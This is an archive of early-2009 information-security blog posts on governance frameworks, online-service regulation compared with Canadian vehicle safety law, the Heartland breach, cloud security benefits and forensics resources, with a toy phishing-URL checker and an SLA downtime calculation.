ISACA recently released an exposure draft of their new governance framework "Risk IT". This framework describes in detail recommended processes for organizations to adopt to manage IT risks effectively. I'll try to follow this post up with a review of this draft and provide some commentary on related values and shortcomings of this new framework.

Wednesday, February 4

New Google Maps for Mobile - Latitude

As we continue to get more connected, Google continues to let us search, track, and map things - now including people - as it releases an update to the mobile version of its maps program.

And look what I see in there in one of the images used to show it off - putting Edmonton literally on the map!

Application Security Procurement Language

Following the publication of the SANS Top 25 application security issues list, a small group of people in New York State has provided a set of contract language and requirements which organizations can use to ensure software development contracts include appropriate security requirements. Although vendor communities might not be thrilled by the prospect of having to train and maintain the security skills of their development staff, I would agree that this type of control goes a long way toward ensuring issues get resolved at the source.

Monday, February 2

ISC2 Releases Online Resource Guide

ISC2 today released an online resource guide, accessible on the web or in downloadable form. The guide provides up-to-date pointers to things like events, online resources, and related organizations that provide information regarding information security.

Another place to bookmark and use for researching security topics.

Monday, January 26

Aligning Online Security Interests

There was an interesting discussion regarding the larger societal problems associated with the use of insecure online services over at Wade Woolwine's blog. This is a follow-on to the discussion by Jeremiah Grossman - regarding the alignment of interests in web security.

This discussion centered on how to align interests related to protecting online information. I have separated this problem into what I think are three important parts:
  1. Definition of common goals,
  2. Evaluation of online services against these definitions, and
  3. Education of consumers/clients/users of the product standards and evaluations.
As a security professional, I often use the metaphor that information security controls mirror the brakes in a car, in that both are a form of risk mitigation: the faster you want to get from A to B, the more robust the brakes you need. In addition, for the purposes of this discussion, vehicles in Canada must meet a minimum standard of brakes to even be allowed on the street, and this contrasts with the security of online services, where no minimum standard is required.

As I discuss each of these, I will try to compare it to the Canadian vehicle industry where a very robust system (not perfect though) exists to help educate consumers to make smart security decisions about the cars they drive based on their regulated safety features.

Defining common security goals

Unlike the auto industry, online security has had a difficult time defining a common language and standards for what a 'safe' online service would consist of. The Payment Card Industry has one standard which pertains to a very small subset of data, and other regulations such as the Health Information Act and the Privacy Act offer some indirect guidance. For automobiles, the Government, under the authority of Transport Canada, provides very specific language as part of the Motor Vehicle Safety Act (MVSA). As you would expect, this act gives very definitive instructions in Schedule III on what controls are required within the different classes of motor vehicles in order to comply with the requirements.

In contrast, the only instances I can find of Canadian federal government definitions of online service security goals would be the Privacy Act and the Personal Information Protection and Electronic Documents Act. These laws are focused squarely on the collection and use of personal identifying information through electronic and non-electronic means, and do not address the delivery of online services affecting commerce, media publications, or any other online service we interact with.

There are many questions related to establishing a common definition of security goals. What are the risks to Canadian society, people and businesses through the use of unsafe online services, and how do we measure them? Is the current privacy legislation broad enough and strong enough to be effective at protecting Canadian people and businesses from the risks of connecting to online and electronic services? Is there a justifiable need to define more specific standards for the safety of online services to allow for them to be independently evaluated like cars are?

Evaluation of Products and Services

Crash tests and safety ratings are a part of the development of every automobile sold in Canada. Canadian manufacturers spend a great deal of money and effort ensuring that their products will pass the minimum standards, and they self-certify that they comply with the legislated requirements. Although I couldn't find a study to show it, I would imagine that the majority of Canadians would correctly expect a vehicle purchased in Canada to already comply with these standards, and thus feel comfortable that when they step on the brakes, the car will stop.

Again in contrast, there is no way for a Canadian to know whether an online service they are interacting with complies with any regulation or certification established to protect their dealings with that service. I would also expect that in a similar poll of Canadians, most would admit to being skeptical of the security and safety of transacting with many online services - even the Canadian government's own - and that in many cases this prevents them from utilizing these services.

Is this level of skepticism about online interactions acceptable to Canadian society? And are individual demands for the safety of online services enough? If demands for vehicle safety were left to the consumer alone, would that be enough incentive to ensure vendors protect us?

Enforcement and Education

Transport Canada also provides some handy guidelines which explain the methods in which the regulations are enforced. These are very carefully worded and provide an excellent description of the objectives, roles and responsibilities of the various Government agencies in ensuring compliance with the regulations.

This is again entirely different when we look at the world of online security, yet this is also to be expected, as the legislation, regulation, and standardization have not been established. At the same time, it does not take much imagination to conceive of a similar arrangement for standardizing the online services provided by Canadian entities. Could we not have a set of criteria against which Canadian-based organizations, public and private, design their services to be protected? Is it too far-fetched to think that we could have a national safety mark that we could use to certify online services?


Although the risks related to using unsafe automobiles may not be comparable in scale to the risks of using unsafe online services (the risk to life is obviously more important than the risk of information compromise), I believe that an alignment of interests, including government regulation, if properly designed and implemented, could offer Canadians a distinct advantage in terms of reputation in the online world.

I would also argue that without these protections, average Canadians will continue to be impacted as our use of online services grows.

But there are also significant challenges in educating both the policy-makers and the public on the risks to insecure online services - how many unreported breaches and abuses of information should be tolerated before we act in this way? Is there a common language that can be developed to ensure that the scope and mandate are clear?

I welcome comments and questions from others on this topic.

A Brief History of CAPTCHA - the Completely Automated Public Turing Test to Tell Computers and Humans Apart

Computer World has published an interesting and informative article regarding the Completely Automated Public Turing Test to Tell Computers and Humans Apart, or CAPTCHA as they are affectionately known.

While they discuss the value of bot-busting techniques, they also note one of my favorite stories about spammers using human-based cracking - my personal favorite of these for its effectiveness: getting people to do the heavy lifting for free!

Thursday, January 22

OS X Forensics Resources

With the recent and growing rise of Apple's market share and Microsoft's gradual decline, forensic investigations will increasingly encounter Macs. But do your existing toolset and methodologies take HFS+'s unique characteristics into consideration? What about FileVault and Time Machine related structures?

Check out the Mac OSX Forensics site as a good place to start with the learning.

ISACA Publication - Defining Information Security Manager Position Requirements

For those Security Managers that have subscriptions to the ISACA publications, there are a couple of interesting articles/publications that have been released. The first one - Defining Information Security Manager Position Requirements - provides a good description of the information security management role within organizations and what it takes, and will take, to succeed.

The JOnline publication has also included an article written by Kim Fath and John Ott on the risks associated with application vulnerabilities. Although not very original, it provides a good basic description of the issues.

Wednesday, January 21

Responsibility for Public Information Security Training

There have been a number of articles posted recently which point out statistics related to corporate responsibility for security practices, data breach disclosure laws which make it a requirement for customers to be notified of such breaches, etc.

Are Canadian Breach Disclosure laws adequate?
Canadian legislation not coming?

In my observation, there may be a greater risk to our online society from general data abuses and breaches against ordinary citizens, and many of these risks appear to stem from our behavior and online habits as a whole. Many of us who are educated in the methods used to exploit sensitive information can protect ourselves through:
  • checking website SSL certs,
  • or knowing what a phishing (spam) email looks like,
  • or running a few Google queries to check into the past of a person we're going to transact with
However, I would argue that the large (and growing) majority of Internet users are not even this savvy. Do we really think that this population of users will learn these skills through osmosis, and that after many, many people are taken advantage of, this type of knowledge will become commonplace? I also take the position that even as the security of our sensitive information becomes more prevalent, the damage done to the overall reputation of the online world will have a much greater negative impact.
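To make the "savvy user" checks above concrete, here is a toy sketch of the kind of heuristics one could automate; the three rules are simplistic illustrations of well-known phishing tells, nowhere near a real anti-phishing engine:

```python
from urllib.parse import urlparse

def looks_phishy(url: str) -> bool:
    """Flag a few crude phishing tells: '@' tricks, raw IP hosts,
    and lookalike subdomain padding (e.g. paypal.com.evil.example.com)."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    if "@" in parsed.netloc:             # user@host syntax hides the real host
        return True
    if host.replace(".", "").isdigit():  # raw IP address instead of a name
        return True
    if host.count(".") >= 3:             # suspiciously deep subdomain nesting
        return True
    return False

print(looks_phishy("http://192.168.0.9/login"))             # → True
print(looks_phishy("http://paypal.com.evil.example.com/"))  # → True
print(looks_phishy("https://www.example.com/"))             # → False
```

Real protection, of course, also needs certificate validation and reputation data - exactly the checks most users never perform by hand.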

All doom and gloom? Not really - there are a few organizations which are helping to educate people more quickly:
  • Government of Canada's Public Safety
  • Stay Safe Online - US non-profit
  • Wiredsafety - Global volunteer organization

One of the questions that comes to mind is: is the amount of public/government attention to this problem adequate? I'll look at this issue in a bit more detail in part 2 of this post.

Tuesday, January 20

3rd Largest Data Breach Reported

Another wonderful example of how "massive" data breaches can occur. It will be interesting to see how the fallout from this incident differs from the TJX event.

From Washington Post:

Heartland called U.S. Secret Service and hired two breach forensics teams to investigate. But Baldwin said it wasn’t until last week that investigators uncovered the source of the breach: A piece of malicious software planted on the company’s payment processing network that recorded payment card data as it was being sent for processing to Heartland by thousands of the company’s retail clients.

Baldwin said Heartland does not know how long the malicious software was in place, or how many accounts may have been compromised. The stolen data includes names, credit and debit card numbers and expiration dates.

“The transactional data crossing our platform, in terms of magnitude… is about 100 million transactions a month,” Baldwin said. “At this point, though, we don’t know the magnitude of what was grabbed.”

Wednesday, January 14

Security Strengths of Cloud Services

As the debate rages on the direction of 'cloud' computing - which is really just a Web 2.0 word for 'software-as-a-service', or SaaS - there are, in my opinion, a few security benefits which make cloud-based services a more secure option for some.

1.  Common platform.  Using a single service platform has the advantage that if a vulnerability exists in the service, it only takes one remedial fix.  This is unlike unique implementations of similar products at each customer site, where vulnerabilities can go unnoticed, unpatched, and exploited for long periods of time.

This glass can also be half-empty, though: a single problem or weakness can affect all of the service's customers.  But if my own experiences with common platform products (like my MacBook) are any indication, I would rather have a problem shared by all of the product's customers - one that will attract the required attention from a vendor at risk of losing them.

2.  Service agreements.  Mature, formal service agreements which are designed to effectively control the services being provided and outline the expectations of both provider and customer are likely to be fair and open.  This results in communities of customers being able to influence the provider's terms, including provisions for security, availability, auditability, etc.

3.  Focus on Information.  Many of cloud computing's opponents will argue that if there can be no inherent trust in a 3rd-party system, then there can be no security afforded to the information itself.  I see this as quite the opposite: if trust cannot be clearly defined, then a conscious decision can be made to keep sensitive data off the service.  This contrasts with the current internal service model, where an organization's staff falsely promote the trust of insecure systems, leaving data at risk without any knowledge of those risks.

4.  Extensions.  As FireGPG is evidence of, many innovators are equipping cloud service users with tools to use these services securely - or to build a layer of trust on top of them.  This builds on the previous point, in which the cloud can be explicitly defined as untrusted and used only for what it can provide to the secure or trusted layer, like transport and storage in the case of secured email.

5.  Buy the availability that you need.  Most services, including the inevitable Google Apps platform, provide easy-to-understand availability service levels.  GAPPS STATS.  While the previous strengths mostly focus on ensuring the confidentiality and integrity of information being manipulated, most cloud services are designed to be purchased depending on the amount of availability required.
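As a back-of-envelope illustration of what those availability levels mean in practice (the numbers are generic uptime-percentage math, assuming a 30-day month, not any provider's actual SLA figures):

```python
def allowed_downtime_minutes(sla_percent: float, days: int = 30) -> float:
    """Minutes of downtime a given uptime SLA permits per billing period."""
    total_minutes = days * 24 * 60
    return total_minutes * (1 - sla_percent / 100)

# A 99.9% ("three nines") SLA still allows roughly 43 minutes
# of downtime in a 30-day month; 99.99% allows only about 4.
print(round(allowed_downtime_minutes(99.9), 1))   # → 43.2
print(round(allowed_downtime_minutes(99.99), 1))  # → 4.3
```

Doing this arithmetic before signing makes it much easier to decide which tier of availability is actually worth paying for.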

The one reality is that the ever-connected nature of cloud services requires a supporting connection to that particular portion of the Internet, and as everyone knows, from time to time there are interruptions to these connections which no one can control - we are still using the same network that evolved from simple connections between defense entities and educational institutions.

I would be very interested in other people's perceptions of the security/insecurity debate around cloud computing.  Here are a few examples a quick cloud search provides:

Monday, January 12

SANS Top 25 Programming Errors

Looks like appsec product vendors now have another angle to sell their gear as SANS has announced the release of their top 25 programming errors.

This is a fantastic list of issues that don't get enough airplay, and instead of focusing on the symptoms of the mistakes (aka OWASP top 10 web-app vulns) this list provides a sample of the root cause issues, although it could be argued that all of these common problems stem from a lack of security policy definition and enforcement regarding development.

At least for those organizations that like to use these types of lists as a policy tool, it should significantly reduce the number of issues that arise from development.

Tuesday, January 6

Forensics Links

Sorry about the gap in posts - it's been an excellent holiday season, and therefore not much time to read or write. Here are a couple of links to some excellent forensics papers which are almost required reading for security professionals these days.
  • An excellent reference for forensics work related to virtual machines has also been published by Brett Shavers here. A must-read for anyone doing forensic work related to VMs.
  • Finally, here is a link to a list of papers related to digital forensics along with a great forum for investigators to discuss related topics. - Forensic Focus
I know that it is easy for security professionals not working daily with forensics to miss out on some of the excellent material out there - I hope this helps catch people up.